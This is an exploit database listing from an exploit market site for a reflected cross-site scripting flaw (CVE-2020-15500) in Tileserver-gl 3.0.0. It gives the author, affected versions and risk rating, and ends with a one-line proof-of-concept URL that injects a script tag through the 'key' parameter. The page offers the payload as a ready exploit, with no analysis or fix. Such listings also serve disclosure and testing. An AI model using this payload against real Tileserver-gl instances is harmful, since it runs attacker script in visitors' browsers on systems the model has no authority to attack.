[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Tileserver-gl 3.0.0 - (key) Reflected Cross-Site Scripting Vulnerability

Author
Akash Chathoth
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-36111
Category
web applications
Date add
15-04-2021
CVE
CVE-2020-15500
Platform
php
# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
# Exploit Author: Akash Chathoth
# Vendor Homepage: http://tileserver.org/
# Software Link: https://github.com/maptiler/tileserver-gl
# Version: versions <3.1.0
# Tested on: 2.6.0
# CVE: 2020-15500

Exploit : http://example.com/?key="><script>alert(document.domain)</script>

#  0day.today [2024-08-22]  #